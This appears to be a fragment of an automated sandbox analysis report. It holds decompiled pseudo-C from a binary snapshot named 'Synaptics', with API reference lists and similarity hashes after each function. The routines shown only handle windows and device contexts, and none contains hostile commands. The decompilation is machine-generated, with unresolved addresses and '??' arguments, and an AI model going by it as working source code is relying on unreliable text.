                                                                                                                                                                                                                            						goto L68;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t182 = _t137 - 0x2b;
                                                                                                                                                                                                                            						if(_t182 == 0) {
                                                                                                                                                                                                                            							_v40 =  *((intOrPtr*)(__edx + 8));
                                                                                                                                                                                                                            							_t283 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                                                                                                                                                                                                            							__eflags = _t283;
                                                                                                                                                                                                                            							if(_t283 < 0) {
                                                                                                                                                                                                                            								goto L67;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_t284 = _t283 + 1;
                                                                                                                                                                                                                            								_t371 = 0;
                                                                                                                                                                                                                            								__eflags = 0;
                                                                                                                                                                                                                            								while(1) {
                                                                                                                                                                                                                            									_v16 = E0044DD30(E0041AC6C(_v8, _t371), 0,  *((intOrPtr*)(_v40 + 8)));
                                                                                                                                                                                                                            									__eflags = _v16;
                                                                                                                                                                                                                            									if(_v16 != 0) {
                                                                                                                                                                                                                            										break;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									_t371 = _t371 + 1;
                                                                                                                                                                                                                            									_t284 = _t284 - 1;
                                                                                                                                                                                                                            									__eflags = _t284;
                                                                                                                                                                                                                            									if(_t284 != 0) {
                                                                                                                                                                                                                            										continue;
                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                            										goto L67;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									goto L69;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								_v24 = E0042572C(0, 1);
                                                                                                                                                                                                                            								_push(_t377);
                                                                                                                                                                                                                            								_push(0x44eda6);
                                                                                                                                                                                                                            								_push( *[fs:eax]);
                                                                                                                                                                                                                            								 *[fs:eax] = _t379;
                                                                                                                                                                                                                            								_v28 = SaveDC( *(_v40 + 0x18));
                                                                                                                                                                                                                            								_push(_t377);
                                                                                                                                                                                                                            								_push(0x44ed89);
                                                                                                                                                                                                                            								_push( *[fs:eax]);
                                                                                                                                                                                                                            								 *[fs:eax] = _t379;
                                                                                                                                                                                                                            								E00425CE8(_v24,  *(_v40 + 0x18));
                                                                                                                                                                                                                            								E00425B88(_v24);
                                                                                                                                                                                                                            								E0044F218(_v16, _v40 + 0x1c, _v24,  *((intOrPtr*)(_v40 + 0x10)));
                                                                                                                                                                                                                            								_pop(_t333);
                                                                                                                                                                                                                            								 *[fs:eax] = _t333;
                                                                                                                                                                                                                            								_push(0x44ed90);
                                                                                                                                                                                                                            								__eflags = 0;
                                                                                                                                                                                                                            								E00425CE8(_v24, 0);
                                                                                                                                                                                                                            								return RestoreDC( *(_v40 + 0x18), _v28);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_t214 = _t182 - 1;
                                                                                                                                                                                                                            							if(_t214 == 0) {
                                                                                                                                                                                                                            								_v44 =  *((intOrPtr*)(__edx + 8));
                                                                                                                                                                                                                            								_t286 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                                                                                                                                                                                                            								__eflags = _t286;
                                                                                                                                                                                                                            								if(_t286 < 0) {
                                                                                                                                                                                                                            									goto L67;
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									_t287 = _t286 + 1;
                                                                                                                                                                                                                            									_t372 = 0;
                                                                                                                                                                                                                            									__eflags = 0;
                                                                                                                                                                                                                            									while(1) {
                                                                                                                                                                                                                            										_v16 = E0044DD30(E0041AC6C(_v8, _t372), 0,  *((intOrPtr*)(_v44 + 8)));
                                                                                                                                                                                                                            										__eflags = _v16;
                                                                                                                                                                                                                            										if(_v16 != 0) {
                                                                                                                                                                                                                            											break;
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            										_t372 = _t372 + 1;
                                                                                                                                                                                                                            										_t287 = _t287 - 1;
                                                                                                                                                                                                                            										__eflags = _t287;
                                                                                                                                                                                                                            										if(_t287 != 0) {
                                                                                                                                                                                                                            											continue;
                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                            											goto L67;
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            										goto L69;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									_t221 =  *((intOrPtr*)(_v8 + 0x10));
                                                                                                                                                                                                                            									L00407730();
                                                                                                                                                                                                                            									_v32 = _t221;
                                                                                                                                                                                                                            									 *[fs:eax] = _t379;
                                                                                                                                                                                                                            									_v24 = E0042572C(0, 1);
                                                                                                                                                                                                                            									 *[fs:eax] = _t379;
                                                                                                                                                                                                                            									_v28 = SaveDC(_v32);
                                                                                                                                                                                                                            									 *[fs:eax] = _t379;
                                                                                                                                                                                                                            									E00425CE8(_v24, _v32);
                                                                                                                                                                                                                            									E00425B88(_v24);
                                                                                                                                                                                                                            									 *((intOrPtr*)( *_v16 + 0x38))(_v44 + 0x10,  *[fs:eax], 0x44eea7, _t377,  *[fs:eax], 0x44eec4, _t377,  *[fs:eax], 0x44eee9, _t377, _t221);
                                                                                                                                                                                                                            									_pop(_t342);
                                                                                                                                                                                                                            									 *[fs:eax] = _t342;
                                                                                                                                                                                                                            									_push(0x44eeae);
                                                                                                                                                                                                                            									__eflags = 0;
                                                                                                                                                                                                                            									E00425CE8(_v24, 0);
                                                                                                                                                                                                                            									return RestoreDC(_v32, _v28);
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								if(_t214 == 0x27) {
                                                                                                                                                                                                                            									_v36 =  *((intOrPtr*)(__edx + 8));
                                                                                                                                                                                                                            									_t290 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                                                                                                                                                                                                            									__eflags = _t290;
                                                                                                                                                                                                                            									if(_t290 < 0) {
                                                                                                                                                                                                                            										goto L67;
                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                            										_t291 = _t290 + 1;
                                                                                                                                                                                                                            										_t373 = 0;
                                                                                                                                                                                                                            										__eflags = 0;
                                                                                                                                                                                                                            										while(1) {
                                                                                                                                                                                                                            											_t251 =  *((intOrPtr*)( *((intOrPtr*)(E0041AC6C(_v8, _t373))) + 0x34))();
                                                                                                                                                                                                                            											_t346 = _v36;
                                                                                                                                                                                                                            											__eflags = _t251 -  *((intOrPtr*)(_t346 + 0xc));
                                                                                                                                                                                                                            											if(_t251 !=  *((intOrPtr*)(_t346 + 0xc))) {
                                                                                                                                                                                                                            												_v16 = E0044DD30(E0041AC6C(_v8, _t373), 1,  *((intOrPtr*)(_v36 + 0xc)));
                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                            												_v16 =  *((intOrPtr*)(E0041AC6C(_v8, _t373) + 0x34));
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__eflags = _v16;
                                                                                                                                                                                                                            											if(_v16 != 0) {
                                                                                                                                                                                                                            												break;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											_t373 = _t373 + 1;
                                                                                                                                                                                                                            											_t291 = _t291 - 1;
                                                                                                                                                                                                                            											__eflags = _t291;
                                                                                                                                                                                                                            											if(_t291 != 0) {
                                                                                                                                                                                                                            												continue;
                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                            												goto L67;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											goto L68;
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            										_t257 = E0044DD60(E0041AC6C(_v8, _t373), 1,  *((intOrPtr*)(_v36 + 8)));
                                                                                                                                                                                                                            										__eflags = _t257;
                                                                                                                                                                                                                            										if(_t257 == 0) {
                                                                                                                                                                                                                            											_t265 = E0041AC6C(_v8, _t373);
                                                                                                                                                                                                                            											__eflags = 0;
                                                                                                                                                                                                                            											_t257 = E0044DD60(_t265, 0,  *((intOrPtr*)(_v36 + 0xc)));
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            										_t353 =  *0x49de0c; // 0x49ebbc
                                                                                                                                                                                                                            										_t56 =  *_t353 + 0x6c; // 0x0
                                                                                                                                                                                                                            										_t355 =  *_t56;
                                                                                                                                                                                                                            										__eflags = _t355;
                                                                                                                                                                                                                            										if(_t355 != 0) {
                                                                                                                                                                                                                            											__eflags = _t257;
                                                                                                                                                                                                                            											if(_t257 == 0) {
                                                                                                                                                                                                                            												_t257 =  *(_t355 + 0x158);
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											_t307 =  *0x49de0c; // 0x49ebbc
                                                                                                                                                                                                                            											__eflags =  *(_t355 + 0x228) & 0x00000008;
                                                                                                                                                                                                                            											if(( *(_t355 + 0x228) & 0x00000008) == 0) {
                                                                                                                                                                                                                            												_t356 =  *0x49dbcc; // 0x49ebb8
                                                                                                                                                                                                                            												E0045ACB4( *_t356, _t291, _t307, _t257, _t373, _t375);
                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                            												E0045AD1C();
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									L67:
                                                                                                                                                                                                                            									_push( *(_t375 + 8));
                                                                                                                                                                                                                            									_push( *(_t375 + 4));
                                                                                                                                                                                                                            									_push( *_t375);
                                                                                                                                                                                                                            									_t144 =  *((intOrPtr*)(_v8 + 0x10));
                                                                                                                                                                                                                            									_push(_t144);
                                                                                                                                                                                                                            									L00407540();
                                                                                                                                                                                                                            									 *((intOrPtr*)(_t375 + 0xc)) = _t144;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								L68:
                                                                                                                                                                                                                            								_pop(_t311);
                                                                                                                                                                                                                            								 *[fs:eax] = _t311;
                                                                                                                                                                                                                            								_push(0x44ef7a);
                                                                                                                                                                                                                            								return E004049C0( &_v52);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				L69:
                                                                                                                                                                                                                            			}
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044eb98
                                                                                                                                                                                                                            0x0044eb7d
                                                                                                                                                                                                                            0x0044eb85
                                                                                                                                                                                                                            0x0044eb8c
                                                                                                                                                                                                                            0x0044eb8c
                                                                                                                                                                                                                            0x0044ea96
                                                                                                                                                                                                                            0x0044ea96
                                                                                                                                                                                                                            0x0044ea97
                                                                                                                                                                                                                            0x0044ef00
                                                                                                                                                                                                                            0x0044ef01
                                                                                                                                                                                                                            0x0044ef03
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ef05
                                                                                                                                                                                                                            0x0044ef05
                                                                                                                                                                                                                            0x0044ef06
                                                                                                                                                                                                                            0x0044ef06
                                                                                                                                                                                                                            0x0044ef08
                                                                                                                                                                                                                            0x0044ef12
                                                                                                                                                                                                                            0x0044ef1a
                                                                                                                                                                                                                            0x0044ef1d
                                                                                                                                                                                                                            0x0044ef20
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ef2a
                                                                                                                                                                                                                            0x0044ef2f
                                                                                                                                                                                                                            0x0044ef31
                                                                                                                                                                                                                            0x0044ef3f
                                                                                                                                                                                                                            0x0044ef40
                                                                                                                                                                                                                            0x0044ef40
                                                                                                                                                                                                                            0x0044ef41
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ef31
                                                                                                                                                                                                                            0x0044ef38
                                                                                                                                                                                                                            0x0044ef38
                                                                                                                                                                                                                            0x0044ea9d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ea9d
                                                                                                                                                                                                                            0x0044ea97
                                                                                                                                                                                                                            0x0044ea94
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ea6a
                                                                                                                                                                                                                            0x0044ea6a
                                                                                                                                                                                                                            0x0044eaa8
                                                                                                                                                                                                                            0x0044eaa9
                                                                                                                                                                                                                            0x0044eaab
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044eab1
                                                                                                                                                                                                                            0x0044eab1
                                                                                                                                                                                                                            0x0044eab2
                                                                                                                                                                                                                            0x0044eab2
                                                                                                                                                                                                                            0x0044eab4
                                                                                                                                                                                                                            0x0044eab9
                                                                                                                                                                                                                            0x0044eac2
                                                                                                                                                                                                                            0x0044eac7
                                                                                                                                                                                                                            0x0044eac9
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044eacf
                                                                                                                                                                                                                            0x0044ead0
                                                                                                                                                                                                                            0x0044ead0
                                                                                                                                                                                                                            0x0044ead1
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ead3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ead3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ead1
                                                                                                                                                                                                                            0x0044eab4
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ea6c
                                                                                                                                                                                                                            0x0044ea6c
                                                                                                                                                                                                                            0x0044ea6f
                                                                                                                                                                                                                            0x0044ecb2
                                                                                                                                                                                                                            0x0044ecbb
                                                                                                                                                                                                                            0x0044ecbc
                                                                                                                                                                                                                            0x0044ecbe
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ecc4
                                                                                                                                                                                                                            0x0044ecc4
                                                                                                                                                                                                                            0x0044ecc5
                                                                                                                                                                                                                            0x0044ecc5
                                                                                                                                                                                                                            0x0044ecc7
                                                                                                                                                                                                                            0x0044ecde
                                                                                                                                                                                                                            0x0044ece1
                                                                                                                                                                                                                            0x0044ece5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044edad
                                                                                                                                                                                                                            0x0044edae
                                                                                                                                                                                                                            0x0044edae
                                                                                                                                                                                                                            0x0044edaf
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044edb5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044edb5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044edaf
                                                                                                                                                                                                                            0x0044ecf7
                                                                                                                                                                                                                            0x0044ecfc
                                                                                                                                                                                                                            0x0044ecfd
                                                                                                                                                                                                                            0x0044ed02
                                                                                                                                                                                                                            0x0044ed05
                                                                                                                                                                                                                            0x0044ed14
                                                                                                                                                                                                                            0x0044ed19
                                                                                                                                                                                                                            0x0044ed1a
                                                                                                                                                                                                                            0x0044ed1f
                                                                                                                                                                                                                            0x0044ed22
                                                                                                                                                                                                                            0x0044ed2e
                                                                                                                                                                                                                            0x0044ed43
                                                                                                                                                                                                                            0x0044ed5c
                                                                                                                                                                                                                            0x0044ed63
                                                                                                                                                                                                                            0x0044ed66

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SaveDC.GDI32(?), ref: 0044ED0F
                                                                                                                                                                                                                            • RestoreDC.GDI32(?,?), ref: 0044ED83
                                                                                                                                                                                                                            • 73C9B080.USER32(?,00000000,0044EF73), ref: 0044EDFD
                                                                                                                                                                                                                            • SaveDC.GDI32(?), ref: 0044EE34
                                                                                                                                                                                                                            • RestoreDC.GDI32(?,?), ref: 0044EEA1
                                                                                                                                                                                                                            • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,0044EF73), ref: 0044EF55
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: RestoreSave$B080NtdllProc_Window
                                                                                                                                                                                                                            • String ID: LbC
                                                                                                                                                                                                                            • API String ID: 4024241980-1054848185
                                                                                                                                                                                                                            • Opcode ID: 9271bb3190d8798086136275e03b0e8807570e2f302814090e834d2e64d099f3
                                                                                                                                                                                                                            • Instruction ID: 9827756e5d0f78ec9e29d95b15367e488dbc04d0ac3e4e0047c09454960c1bc5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9271bb3190d8798086136275e03b0e8807570e2f302814090e834d2e64d099f3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5AE19D34A04605DFEB10DF6AC8819AEF3F5FF58304B2485AAE805A7361D738ED41CB99
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 38%
                                                                                                                                                                                                                            			E0045A104(void* __eax) {
                                                                                                                                                                                                                            				struct HWND__* _t21;
                                                                                                                                                                                                                            				intOrPtr* _t26;
                                                                                                                                                                                                                            				signed int _t29;
                                                                                                                                                                                                                            				intOrPtr* _t30;
                                                                                                                                                                                                                            				int _t33;
                                                                                                                                                                                                                            				intOrPtr _t36;
                                                                                                                                                                                                                            				void* _t51;
                                                                                                                                                                                                                            				int _t60;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t51 = __eax;
                                                                                                                                                                                                                            				_t21 = IsIconic( *(__eax + 0x30));
                                                                                                                                                                                                                            				if(_t21 != 0) {
                                                                                                                                                                                                                            					SetActiveWindow( *(_t51 + 0x30));
                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t51 + 0x44)) == 0 ||  *((char*)(_t51 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t51 + 0x44)) + 0x57)) == 0) {
                                                                                                                                                                                                                            						L6:
                                                                                                                                                                                                                            						E0045906C( *(_t51 + 0x30), 9, __eflags);
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t60 = IsWindowEnabled(E00441704( *((intOrPtr*)(_t51 + 0x44))));
                                                                                                                                                                                                                            						if(_t60 == 0) {
                                                                                                                                                                                                                            							goto L6;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                            							_push(0xf120);
                                                                                                                                                                                                                            							_push(0x112);
                                                                                                                                                                                                                            							_push( *(_t51 + 0x30));
                                                                                                                                                                                                                            							L00407540();
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t26 =  *0x49d970; // 0x49e900
                                                                                                                                                                                                                            					_t29 =  *((intOrPtr*)( *_t26))(1, 0, 0, 0x40) >> 1;
                                                                                                                                                                                                                            					if(_t60 < 0) {
                                                                                                                                                                                                                            						asm("adc eax, 0x0");
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t30 =  *0x49d970; // 0x49e900
                                                                                                                                                                                                                            					_t33 =  *((intOrPtr*)( *_t30))(0, _t29) >> 1;
                                                                                                                                                                                                                            					if(_t60 < 0) {
                                                                                                                                                                                                                            						asm("adc eax, 0x0");
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					SetWindowPos( *(_t51 + 0x30), 0, _t33, ??, ??, ??, ??);
                                                                                                                                                                                                                            					_t36 =  *((intOrPtr*)(_t51 + 0x44));
                                                                                                                                                                                                                            					if(_t36 != 0 &&  *((char*)(_t36 + 0x22b)) == 1 &&  *((char*)(_t36 + 0x57)) == 0) {
                                                                                                                                                                                                                            						E00454D78(_t36, 0);
                                                                                                                                                                                                                            						E00457194( *((intOrPtr*)(_t51 + 0x44)));
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					E0045974C(_t51);
                                                                                                                                                                                                                            					_t21 =  *0x49ebbc; // 0x21e1320
                                                                                                                                                                                                                            					_t15 = _t21 + 0x64; // 0x0
                                                                                                                                                                                                                            					_t55 =  *_t15;
                                                                                                                                                                                                                            					if( *_t15 != 0) {
                                                                                                                                                                                                                            						_t21 = SetFocus(E00441704(_t55));
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if( *((short*)(_t51 + 0x122)) != 0) {
                                                                                                                                                                                                                            						return  *((intOrPtr*)(_t51 + 0x120))();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t21;
                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • IsIconic.USER32 ref: 0045A10C
                                                                                                                                                                                                                            • SetActiveWindow.USER32(?,?,?,?,00459B2D,00000000,00459FEE), ref: 0045A11D
                                                                                                                                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 0045A140
                                                                                                                                                                                                                            • NtdllDefWindowProc_A.USER32(?,00000112,0000F120,00000000,00000000,?,?,?,?,00459B2D,00000000,00459FEE), ref: 0045A159
                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,?,?,00459B2D,00000000,00459FEE), ref: 0045A19F
                                                                                                                                                                                                                            • SetFocus.USER32(00000000,?,00000000,00000000,?,?,00459B2D,00000000,00459FEE), ref: 0045A1E4
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Window$ActiveEnabledFocusIconicNtdllProc_
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3996302123-0
                                                                                                                                                                                                                            • Opcode ID: a04679a4ac2906456c8448a2d84214dddb4dc2f3039b57f19c98973d0d101b18
                                                                                                                                                                                                                            • Instruction ID: e53a9b633d1b0bd006f11759a665d113d80ac3550e73a578dd09315b07be2b8d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a04679a4ac2906456c8448a2d84214dddb4dc2f3039b57f19c98973d0d101b18
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B831DD71B006009BEB11EB69CD86B563798AB04709F0805AAFE04DF2D7D67DEC58C75A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 85%
                                                                                                                                                                                                                            			E004410F0(void* __eax, int __ecx, int __edx, int _a4, int _a8) {
                                                                                                                                                                                                                            				void* _v20;
                                                                                                                                                                                                                            				struct _WINDOWPLACEMENT _v48;
                                                                                                                                                                                                                            				char _v64;
                                                                                                                                                                                                                            				void* _t31;
                                                                                                                                                                                                                            				int _t45;
                                                                                                                                                                                                                            				int _t51;
                                                                                                                                                                                                                            				void* _t52;
                                                                                                                                                                                                                            				int _t56;
                                                                                                                                                                                                                            				int _t58;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t56 = __ecx;
                                                                                                                                                                                                                            				_t58 = __edx;
                                                                                                                                                                                                                            				_t52 = __eax;
                                                                                                                                                                                                                            				if(__edx !=  *((intOrPtr*)(__eax + 0x40)) || __ecx !=  *((intOrPtr*)(__eax + 0x44)) || _a8 !=  *((intOrPtr*)(__eax + 0x48))) {
                                                                                                                                                                                                                            					L4:
                                                                                                                                                                                                                            					if(E00441A08(_t52) == 0) {
                                                                                                                                                                                                                            						L7:
                                                                                                                                                                                                                            						 *(_t52 + 0x40) = _t58;
                                                                                                                                                                                                                            						 *(_t52 + 0x44) = _t56;
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t52 + 0x48)) = _a8;
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t52 + 0x4c)) = _a4;
                                                                                                                                                                                                                            						_t31 = E00441A08(_t52);
                                                                                                                                                                                                                            						__eflags = _t31;
                                                                                                                                                                                                                            						if(_t31 != 0) {
                                                                                                                                                                                                                            							_v48.length = 0x2c;
                                                                                                                                                                                                                            							GetWindowPlacement( *(_t52 + 0x180),  &_v48);
                                                                                                                                                                                                                            							E0043A91C(_t52,  &_v64);
                                                                                                                                                                                                                            							asm("movsd");
                                                                                                                                                                                                                            							asm("movsd");
                                                                                                                                                                                                                            							asm("movsd");
                                                                                                                                                                                                                            							asm("movsd");
                                                                                                                                                                                                                            							SetWindowPlacement( *(_t52 + 0x180),  &_v48);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						L9:
                                                                                                                                                                                                                            						E0043A5D0(_t52);
                                                                                                                                                                                                                            						return E00403DE8(_t52, _t66);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t45 = IsIconic( *(_t52 + 0x180));
                                                                                                                                                                                                                            					_t66 = _t45;
                                                                                                                                                                                                                            					if(_t45 != 0) {
                                                                                                                                                                                                                            						goto L7;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					SetWindowPos( *(_t52 + 0x180), 0, _t58, _t56, _a8, _a4, 0x14);
                                                                                                                                                                                                                            					goto L9;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t51 = _a4;
                                                                                                                                                                                                                            					if(_t51 ==  *((intOrPtr*)(__eax + 0x4c))) {
                                                                                                                                                                                                                            						return _t51;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					goto L4;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • IsIconic.USER32 ref: 0044112F
                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 0044114D
                                                                                                                                                                                                                            • GetWindowPlacement.USER32(?,0000002C), ref: 00441183
                                                                                                                                                                                                                            • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 004411A7
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Window$Placement$Iconic
                                                                                                                                                                                                                            • String ID: ,
                                                                                                                                                                                                                            • API String ID: 568898626-3772416878
                                                                                                                                                                                                                            • Opcode ID: cbc295ee499962ac83a9ff01bfd7ce2be257ba844d1b33c8d8d56419791f1386
                                                                                                                                                                                                                            • Instruction ID: 973ca0ced29493b3e0d87defc8b2cb9363f4da81e4e6ee6b5ea2909c58c8dcf6
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cbc295ee499962ac83a9ff01bfd7ce2be257ba844d1b33c8d8d56419791f1386
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA21B271A00108ABDF10EF69C8C19DA77A8AF4D354F00406AFE14EF352D779ED448B65
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                                                                                            			E0045A054(void* __eax) {
                                                                                                                                                                                                                            				int _t21;
                                                                                                                                                                                                                            				struct HWND__* _t36;
                                                                                                                                                                                                                            				void* _t40;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t40 = __eax;
                                                                                                                                                                                                                            				_t1 = _t40 + 0x30; // 0x0
                                                                                                                                                                                                                            				_t21 = IsIconic( *_t1);
                                                                                                                                                                                                                            				if(_t21 == 0) {
                                                                                                                                                                                                                            					E0045973C();
                                                                                                                                                                                                                            					_t2 = _t40 + 0x30; // 0x0
                                                                                                                                                                                                                            					SetActiveWindow( *_t2);
                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t40 + 0x44)) == 0 ||  *((char*)(_t40 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t40 + 0x44)) + 0x57)) == 0 || IsWindowEnabled(E00441704( *((intOrPtr*)(_t40 + 0x44)))) == 0) {
                                                                                                                                                                                                                            						_t15 = _t40 + 0x30; // 0x0
                                                                                                                                                                                                                            						_t21 = E0045906C( *_t15, 6, __eflags);
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t43 =  *((intOrPtr*)(_t40 + 0x44));
